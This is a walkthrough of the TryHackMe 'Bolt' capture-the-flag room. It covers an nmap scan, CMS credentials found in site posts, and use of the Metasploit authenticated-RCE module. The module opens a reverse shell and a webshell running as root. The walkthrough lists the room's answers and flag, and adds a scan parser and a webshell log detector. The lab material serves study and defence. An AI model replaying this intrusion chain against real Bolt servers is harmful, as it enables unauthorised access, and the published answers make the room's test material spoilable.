
Overview

This is a walkthrough of the TryHackMe room "Bolt".

Task 2

Q1.What port number has a web server with a CMS running?

Run a full-range port scan with version detection and default scripts.

$ nmap -Pn -sC -sV -A -p- 10.10.231.95 -oN nmap_result
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
|   256 77:c7:c1:ae:31:41:21:e4:93:0e:9a:dd:0b:29:e1:ff (ECDSA)
|_  256 07:05:43:46:9d:b2:3e:f0:4d:69:67:e4:91:d3:d3:7f (ED25519)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.0 404 Not Found
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: private, must-revalidate
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Content-Type: text/html; charset=UTF-8
|     pragma: no-cache
|     expires: -1
|     X-Debug-Token: 6fdaf3
|     <!doctype html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     </head>
|     <body>
|     href="#main-content" class="vis
|   GetRequest: 
|     HTTP/1.0 200 OK
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Connection: close
|     X-Powered-By: PHP/7.2.32-1+ubuntu18.04.1+deb.sury.org+1
|     Cache-Control: public, s-maxage=600
|     Date: Wed, 03 Jul 2024 16:39:33 GMT
|     Content-Type: text/html; charset=UTF-8
|     X-Debug-Token: d919f7
|     <!doctype html>
|     <html lang="en-GB">
|     <head>
|     <meta charset="utf-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Bolt | A hero is unleashed</title>
|     <link href="https://fonts.googleapis.com/css?family=Bitter|Roboto:400,400i,700" rel="stylesheet">
|     <link rel="stylesheet" href="/theme/base-2018/css/bulma.css?8ca0842ebb">
|     <link rel="stylesheet" href="/theme/base-2018/css/theme.css?6cb66bfe9f">
|     <meta name="generator" content="Bolt">
|     <link rel="canonical" href="http://0.0.0.0:8000/">
|     </head>
|_    <body class="front">
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service

The open ports are summarized below. Note that nmap could not identify the server on port 8000 by name; the version column there is only the PHP banner, which is what the unrecognized-service notice at the end of the scan refers to.

Port  Service  Version
22    ssh      OpenSSH 7.6p1
80    http     Apache httpd 2.4.29
8000  http     PHP 7.2.32-1
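The port summary above can be produced mechanically from the nmap -oN file rather than by hand. The following is an added example (not part of the original walkthrough) that parses the normal-output lines shown above, embedded here as constructed sample input, and picks out the port where an http-generator script revealed a CMS. The regexes for nmap's port and script lines are my own assumption about the normal-output format, not an nmap-provided parser.

```python
import re

# Constructed sample: the relevant lines copied from the nmap -oN output above.
NMAP_OUTPUT = """\
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f3:85:ec:54:f2:01:b1:94:40:de:42:e8:21:97:20:80 (RSA)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8000/tcp open  http    (PHP 7.2.32-1)
|_http-title: Bolt | A hero is unleashed
|_http-generator: Bolt
"""

# "PORT/PROTO  STATE  SERVICE  VERSION..." lines (assumed normal-output layout)
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
# "|_script-name: value" / "| script-name: value" lines; continuation lines
# such as the hostkey fingerprints have no "name:" prefix and are skipped
SCRIPT_LINE = re.compile(r"^\|_?\s*([\w-]+):\s*(.*)$")


def parse_nmap(text):
    """Return one dict per port line, with NSE script output attached to it."""
    ports = []
    current = None
    for line in text.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current = {
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": {},
            }
            ports.append(current)
            continue
        m = SCRIPT_LINE.match(line)
        if m and current is not None:
            current["scripts"][m.group(1)] = m.group(2).strip()
    return ports


def open_web_ports(ports):
    """Open ports that either have the http service tag or returned a page title."""
    return [p["port"] for p in ports
            if p["state"] == "open"
            and (p["service"] == "http" or "http-title" in p["scripts"])]


def cms_ports(ports):
    """Ports where the page advertised a CMS through a generator meta tag."""
    return [p["port"] for p in ports if "http-generator" in p["scripts"]]


def summary_table(ports):
    """Plain-text Port / Service / Version table like the one in the walkthrough."""
    rows = ["Port  Service  Version"]
    for p in ports:
        rows.append(f"{p['port']:<5} {p['service']:<8} {p['version']}")
    return "\n".join(rows)


if __name__ == "__main__":
    found = parse_nmap(NMAP_OUTPUT)
    print(summary_table(found))
    for port in cms_ports(found):
        print(f"port {port}: CMS = {found[[p['port'] for p in found].index(port)]['scripts']['http-generator']}")
```

Running it against a real scan file is a matter of reading the -oN output into NMAP_OUTPUT; the generator tag is what answers Q1 here, since port 80 is only the Apache default page.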

The website is reachable on port 8000.

(screenshot: home page.png)

A.8000

Q2.What is the username we can find in the CMS?

The /entry/message-from-admin page reveals the username: the message addressed to Jake gives the username bolt.

(screenshot: q2.png)

A.bolt

Q3.What is the password we can find for the username?

The /entry/message-for-it-department page reveals the password for that user.

(screenshot: q3.png)

A.boltadmin123

Q4.What version of the CMS is installed on the server? (Ex: Name 1.1.1)

Browsing to the /bolt path shows the CMS login page.

Log in with username bolt and password boltadmin123.

(screenshot: login form.png)

The login succeeds, and the Bolt CMS version is shown in the dashboard footer.

(screenshot: login dashbord.png)

A.Bolt 3.7.1

Q5.There's an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What's its EDB-ID?

Searching with searchsploit shows an authenticated RCE for Bolt CMS 3.7.0 (the room asks for the exploit against a previous version; the target runs 3.7.1).

$ searchsploit bolt      
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Apple WebKit - 'JSC::SymbolTableEntry::isWatchable' Heap Buffer Overflow           | multiple/dos/41869.html
Bolt CMS 3.6.10 - Cross-Site Request Forgery                                       | php/webapps/47501.txt
Bolt CMS 3.6.4 - Cross-Site Scripting                                              | php/webapps/46495.txt
Bolt CMS 3.6.6 - Cross-Site Request Forgery / Remote Code Execution                | php/webapps/46664.html
Bolt CMS 3.7.0 - Authenticated Remote Code Execution                               | php/webapps/48296.py
Bolt CMS < 3.6.2 - Cross-Site Scripting                                            | php/webapps/46014.txt
Bolthole Filter 2.6.1 - Address Parsing Buffer Overflow                            | multiple/remote/24982.txt
BoltWire 3.4.16 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities        | php/webapps/36552.txt
BoltWire 6.03 - Local File Inclusion                                               | php/webapps/48411.txt
Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities                        | php/webapps/21132.txt
CMS Bolt - Arbitrary File Upload (Metasploit)                                      | php/remote/38196.rb
----------------------------------------------------------------------------------- ---------------------------------

A.48296

Q6.Metasploit recently added an exploit module for this vulnerability. What's the full path for this exploit? (Ex: exploit/....)

Start Metasploit and search for bolt to get the module path.

$ msfconsole
msf6 > search bolt

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/webapp/bolt_authenticated_rce  2020-05-07       great      Yes    Bolt CMS 3.7.0 - Authenticated Remote Code Execution
   1  exploit/multi/http/bolt_file_upload         2015-08-17       excellent  Yes    CMS Bolt File Upload Vulnerability

A.exploit/unix/webapp/bolt_authenticated_rce

Q8.Look for flag.txt inside the machine.

Set the exploit options (RHOSTS, LHOST, USERNAME and PASSWORD from the credentials found above).

(screenshot: exploit.png)

Running the exploit returns a shell. whoami shows that the PHP process serving port 8000 runs as root, so no privilege escalation step is needed.

msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "gjra".          
[*] Found 3 potential token(s) for creating .php files.
[+] Deleted file zfyrlybkfig.php.              
[+] Deleted file okuiyrzzq.php.                
[+] Used token a8a7ac14b217ff2d8d0d227757 to create huiserolkkz.php.
[*] Attempting to execute the payload via "/files/huiserolkkz.php?gjra=`payload`"                                    
[!] No response, may have executed a blocking payload!              
[*] Command shell session 1 opened (10.6.55.144:4444 -> 10.10.231.95:44432) at 2024-07-03 13:19:42 -0400             
[+] Deleted file huiserolkkz.php.
[+] Reverted user profile back to original state.
ls
index.html                                           
pwd                       
/home/bolt/public/files                      
whoami
root
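The Metasploit output shows what the attack looks like from the server side: a POST to /bolt/profile that changes the display name, a .php file created under the public /files directory, and a GET to that file with a command in a query parameter. The following is an added example, not from the walkthrough or from Bolt, of a detection pass over web access logs in combined format for that pattern. The log lines are constructed; the /files/ upload directory and the /bolt/profile endpoint are taken from the output above, while the combined log format and the list of script extensions are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines in combined format (not from the room).
# The paths mirror what the Metasploit run reported; the client and timestamps
# are made up for the example.
SAMPLE_LOG = """\
10.6.55.144 - - [03/Jul/2024:13:19:40 -0400] "GET /bolt/login HTTP/1.1" 200 3456 "-" "Mozilla/5.0"
10.6.55.144 - - [03/Jul/2024:13:19:41 -0400] "POST /bolt/profile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.6.55.144 - - [03/Jul/2024:13:19:42 -0400] "GET /files/huiserolkkz.php?gjra=id HTTP/1.1" 200 45 "-" "Mozilla/5.0"
10.10.231.1 - - [03/Jul/2024:13:20:01 -0400] "GET /files/index.html HTTP/1.1" 200 12 "-" "Mozilla/5.0"
10.10.231.1 - - [03/Jul/2024:13:20:02 -0400] "GET /theme/base-2018/css/bulma.css HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Combined log format (assumed): ip ident user [ts] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

UPLOAD_DIRS = ("/files/",)                 # Bolt's public upload directory (from the output above)
SCRIPT_EXTS = (".php", ".phtml", ".phar")  # assumed set of server-side script extensions
PROFILE_PATH = "/bolt/profile"             # endpoint the exploit modified (from the output above)


def parse_line(line):
    """Split one combined-format line into fields; None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Return an alert label for one request, or None if it looks benign."""
    path = rec["path"].lower()
    if path.startswith(UPLOAD_DIRS) and path.endswith(SCRIPT_EXTS):
        # A server-side script under the upload directory is abnormal by itself;
        # a query string on top of it matches the $_GET-driven webshell pattern.
        return "webshell_invocation" if rec["query"] else "script_in_upload_dir"
    if rec["method"] == "POST" and path == PROFILE_PATH:
        # Low severity alone (normal admin activity); kept for correlation.
        return "profile_update"
    return None


def detect(log_text):
    """Run the classifier over a log and correlate script hits with earlier profile writes."""
    alerts = []
    profile_writers = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label == "profile_update":
            profile_writers.add(rec["ip"])
            continue
        if label is not None:
            alerts.append({
                "ip": rec["ip"],
                "path": rec["path"],
                "label": label,
                "status": rec["status"],
                "correlated_profile_write": rec["ip"] in profile_writers,
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The profile change carries its payload in the POST body, which a request-line log never shows, so on its own it is only a correlation signal; the high-confidence indicator is a server-side script being requested from the upload directory at all, regardless of the response status.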

The flag can be read from /home/flag.txt.

/home/flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

A.THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
